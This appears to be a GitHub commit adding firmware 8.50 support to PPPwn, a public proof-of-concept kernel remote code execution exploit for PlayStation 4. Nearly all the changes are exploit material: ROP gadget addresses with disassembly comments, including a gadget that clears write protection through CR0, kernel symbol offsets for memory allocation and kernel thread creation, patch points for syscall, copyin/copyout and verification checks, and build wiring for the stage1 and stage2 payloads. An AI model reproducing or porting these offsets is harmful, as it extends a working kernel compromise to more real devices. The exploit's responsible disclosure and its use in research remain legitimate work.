✨ Added support for FW 8.50 (TheOfficialFloW#38)

* ✨ Added 8.50 offsets to `offsets.py` * ✨ Added `stage1` offsets for FW 8.50 * ✨ Added `stage2` offsets for FW 8.50 * ✨ Added support for FW 8.50 * 🚑 Fixed `JMP_R14` offset + 💡 Updated comments * 🍻 What if... * 🚑 `.text` offsets starts with `ffffffff82` 🤦‍♂️
Karf5 · May 4, 2024 · 3881960 · 3881960
1 parent 1252d98
commit 3881960
Show file tree

Hide file tree

Showing 7 changed files with 158 additions and 7 deletions.
diff --git a/README.md b/README.md
@@ -2,6 +2,7 @@
 PPPwn is a kernel remote code execution exploit for PlayStation 4 up to FW 11.00. This is a proof-of-concept exploit for [CVE-2006-4304](https://hackerone.com/reports/2177925) that was reported responsibly to PlayStation.
 
 Supported versions are:
+- FW 8.50
 - FW 9.00
 - FW 9.03 / 9.04
 - FW 9.50 / 9.60

diff --git a/offsets.py b/offsets.py
@@ -3,6 +3,99 @@
 # This software may be modified and distributed under the terms
 # of the MIT license.  See the LICENSE file for details.
 
+# FW 8.50
+class OffsetsFirmware_850:
+    PPPOE_SOFTC_LIST = 0xffffffff83dd6018
+
+    KERNEL_MAP = 0xffffffff83e64228
+
+    SETIDT = 0xffffffff82467340
+
+    KMEM_ALLOC = 0xffffffff824199a0
+    KMEM_ALLOC_PATCH1 = 0xffffffff82419a6c
+    KMEM_ALLOC_PATCH2 = 0xffffffff82419a74
+
+    MEMCPY = 0xffffffff825a40f0
+
+    # 0xffffffff823ce849 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret
+    MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823ce849
+
+    SECOND_GADGET_OFF = 0x3b
+
+    # 0xffffffff8237e09d : jmp qword ptr [rsi + 0x3b]
+    FIRST_GADGET = 0xffffffff8237e09d
+
+    # 0xffffffff82c766e6 : push rbp ; jmp qword ptr [rsi]
+    PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c766e6
+
+    # 0xffffffff822a3a31 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10]
+    POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff822a3a31
+
+    # 0xffffffff829261c6 : lea rsp, [rsi + 0x20] ; repz ret
+    LEA_RSP_RSI_20_REPZ_RET = 0xffffffff829261c6
+
+    # 0xffffffff826d2a8a : add rsp, 0x28 ; pop rbp ; ret
+    ADD_RSP_28_POP_RBP_RET = 0xffffffff826d2a8a
+
+    # 0xffffffff82439c6f : add rsp, 0xb0 ; pop rbp ; ret
+    ADD_RSP_B0_POP_RBP_RET = 0xffffffff82439c6f
+
+    # 0xffffffff822008e0 : ret
+    RET = 0xffffffff822008e0
+
+    # 0xffffffff825dc87d : pop rdi ; ret
+    POP_RDI_RET = 0xffffffff825dc87d
+
+    # 0xffffffff823882c9 : pop rsi ; ret
+    POP_RSI_RET = 0xffffffff823882c9
+
+    # 0xffffffff8232eec2 : pop rdx ; ret
+    POP_RDX_RET = 0xffffffff8232eec2
+
+    # 0xffffffff82246d0c : pop rcx ; ret
+    POP_RCX_RET = 0xffffffff82246d0c
+
+    # 0xffffffff8237cd26 : pop r8 ; pop rbp ; ret
+    POP_R8_POP_RBP_RET = 0xffffffff8237cd26
+
+    # 0xffffffff827a366f : pop r12 ; ret
+    POP_R12_RET = 0xffffffff827a366f
+
+    # 0xffffffff82202d74 : pop rax ; ret
+    POP_RAX_RET = 0xffffffff82202d74
+
+    # 0xffffffff822008df : pop rbp ; ret
+    POP_RBP_RET = 0xffffffff822008df
+
+    # 0xffffffff82bb5866 : push rsp ; pop rsi ; ret
+    PUSH_RSP_POP_RSI_RET = 0xffffffff82bb5866
+
+    # 0xffffffff82444180 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax
+    MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff82444180
+
+    # 0xffffffff82b73476 : mov byte ptr [rcx], al ; ret
+    MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff82b73476
+
+    # 0xffffffff8220fbbc : mov rdi, rbx ; call r12
+    MOV_RDI_RBX_CALL_R12 = 0xffffffff8220fbbc
+
+    # 0xffffffff8220f9f7 : mov rdi, r14 ; call r12
+    MOV_RDI_R14_CALL_R12 = 0xffffffff8220f9f7
+
+    # 0xffffffff8253628e : mov rsi, rbx ; call rax
+    MOV_RSI_RBX_CALL_RAX = 0xffffffff8253628e
+
+    # 0xffffffff825bb768 : mov r14, rax ; call r8
+    MOV_R14_RAX_CALL_R8 = 0xffffffff825bb768
+
+    # 0xffffffff82cb68da : add rdi, rcx ; ret
+    ADD_RDI_RCX_RET = 0xffffffff82cb68da
+
+    # 0xffffffff82346e67 : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret
+    SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff82346e67
+
+    # 0xffffffff82b845c7 : jmp r14
+    JMP_R14 = 0xffffffff82b845c7
 
 # FW 9.00
 class OffsetsFirmware_900:

diff --git a/pppwn.py b/pppwn.py
@@ -820,8 +820,8 @@ def main():
     parser.add_argument('--interface', required=True)
     parser.add_argument('--fw',
                         choices=[
-                            '900', '903', '904', '950', '960', '1000', '1001',
-                            '1050', '1070', '1071', '1100'
+                            '850', '900', '903', '904', '950', '960', '1000',
+                            '1001', '1050', '1070', '1071', '1100'
                         ],
                         default='1100')
     parser.add_argument('--stage1', default='stage1/stage1.bin')
@@ -837,7 +837,9 @@ def main():
     with open(args.stage2, mode='rb') as f:
         stage2 = f.read()
 
-    if args.fw == '900':
+    if args.fw == '850':
+        offs = OffsetsFirmware_850()
+    elif args.fw == '900':
         offs = OffsetsFirmware_900()
     elif args.fw in ('903', '904'):
         offs = OffsetsFirmware_903_904()

diff --git a/stage1/Makefile b/stage1/Makefile
@@ -6,7 +6,7 @@ OBJCOPY = objcopy
 CFLAGS = -DSMP -isystem ../freebsd-headers/include -Wl,--build-id=none -Os -fno-stack-protector
 LDFLAGS = -T linker.ld -nostartfiles -nostdlib
 
-ifneq ($(filter $(FW), 900 903 904 950 960 1000 1001 1050 1070 1071 1100),)
+ifneq ($(filter $(FW), 850 900 903 904 950 960 1000 1001 1050 1070 1071 1100),)
 CFLAGS += -DFIRMWARE=$(FW)
 else
 $(error "Invalid firmware")

diff --git a/stage1/offsets.h b/stage1/offsets.h
@@ -8,7 +8,37 @@
 #ifndef __OFFSETS_H__
 #define __OFFSETS_H__
 
-#if FIRMWARE == 900 // FW 9.00
+
+#if FIRMWARE == 850 // FW 8.50
+
+#define kdlsym_addr_Xfast_syscall 0xffffffff822001c0 // Identical to 9.00
+
+#define kdlsym_addr_pppoe_softc_list 0xffffffff83dd6018
+
+#define kdlsym_addr_cc_cpu 0xffffffff83dca4f0
+#define kdlsym_addr_callwheelsize 0xffffffff83dcc4f0
+
+#define kdlsym_addr_nd6_llinfo_timer 0xffffffff822f9000
+
+#define kdlsym_addr_Xill 0xffffffff8257e710
+#define kdlsym_addr_setidt 0xffffffff82467340
+
+#define kdlsym_addr_kernel_map 0xffffffff83e64228
+#define kdlsym_addr_kmem_alloc 0xffffffff824199a0
+
+#define kdlsym_addr_kproc_create 0xffffffff82210610
+#define kdlsym_addr_kproc_exit 0xffffffff82210880
+
+#define kdlsym_addr_ksock_create 0xffffffff82331600
+#define kdlsym_addr_ksock_close 0xffffffff82331670
+#define kdlsym_addr_ksock_bind 0xffffffff82331680
+#define kdlsym_addr_ksock_recv 0xffffffff823319e0
+
+#define kdlsym_addr_uart_patch 0xffffffff8373ae88
+#define kdlsym_addr_veri_patch 0xffffffff82824674
+
+
+#elif FIRMWARE == 900 // FW 9.00
 
 #define kdlsym_addr_Xfast_syscall 0xffffffff822001c0
 

diff --git a/stage2/Makefile b/stage2/Makefile
@@ -6,7 +6,7 @@ OBJCOPY = objcopy
 CFLAGS = -DSMP -isystem ../freebsd-headers/include -Wl,--build-id=none -Os -fno-stack-protector
 LDFLAGS = -T linker.ld -nostartfiles -nostdlib
 
-ifneq ($(filter $(FW), 900 903 904 950 960 1000 1001 1050 1070 1071 1100),)
+ifneq ($(filter $(FW), 850 900 903 904 950 960 1000 1001 1050 1070 1071 1100),)
 CFLAGS += -DFIRMWARE=$(FW)
 else
 $(error "Invalid firmware")

diff --git a/stage2/offsets.h b/stage2/offsets.h
@@ -8,7 +8,32 @@
 #ifndef __OFFSETS_H__
 #define __OFFSETS_H__
 
-#if FIRMWARE == 900 // FW 9.00
+
+#if FIRMWARE == 850 // FW 8.50
+
+#define kdlsym_addr_Xfast_syscall 0xffffffff822001c0
+
+#define kdlsym_addr_printf 0xffffffff8235d570
+
+#define kdlsym_addr_sysent 0xffffffff832fc5c0
+
+#define kdlsym_addr_amd_syscall_patch1 0xffffffff82200490 // Identical to 9.00
+#define kdlsym_addr_amd_syscall_patch2 0xffffffff822004b5 // Identical to 9.00
+#define kdlsym_addr_amd_syscall_patch3 0xffffffff822004b9 // Identical to 9.00
+#define kdlsym_addr_amd_syscall_patch4 0xffffffff822004c2 // Identical to 9.00
+
+#define kdlsym_addr_copyin_patch1 0xffffffff825a4337
+#define kdlsym_addr_copyin_patch2 0xffffffff825a4343
+
+#define kdlsym_addr_copyout_patch1 0xffffffff825a4242
+#define kdlsym_addr_copyout_patch2 0xffffffff825a424e
+
+#define kdlsym_addr_copyinstr_patch1 0xffffffff825a47e3
+#define kdlsym_addr_copyinstr_patch2 0xffffffff825a47ef
+#define kdlsym_addr_copyinstr_patch3 0xffffffff825a4820
+
+
+#elif FIRMWARE == 900 // FW 9.00
 
 #define kdlsym_addr_Xfast_syscall 0xffffffff822001c0